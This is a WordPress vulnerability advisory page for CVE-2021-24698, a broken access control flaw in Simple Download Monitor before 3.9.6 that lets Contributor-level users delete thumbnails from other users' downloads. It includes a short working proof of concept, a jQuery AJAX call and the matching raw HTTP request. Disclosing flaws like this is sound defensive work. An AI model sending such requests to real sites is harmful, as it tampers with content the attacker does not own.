logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Simple Download Monitor < 3.9.6 - Arbitrary Thumbnails Removal

Description

The plugin allows users with a role as low as Contributor to remove thumbnails from downloads they do not own, even if they cannot normally edit the download.

Proof of Concept

jQuery.post(ajaxurl, {
action: "sdm_remove_thumbnail_image",
post_id_del: 613 // not owned by the user
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Connection: close
Cookie: [contrib+ not owning the download to remove the thumbnail from]

action=sdm_remove_thumbnail_image&post_id_del=613

Affects Plugins

simple-download-monitor

Fixed in version 3.9.6

References

CVE

CVE-2021-24698

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

1fda1356-77d8-4e77-9ee6-8f9ceeb3d380

Timeline

Publicly Published

2021-10-05 (about 3 months ago)

Added

2021-10-05 (about 3 months ago)

Last Updated

2021-10-05 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin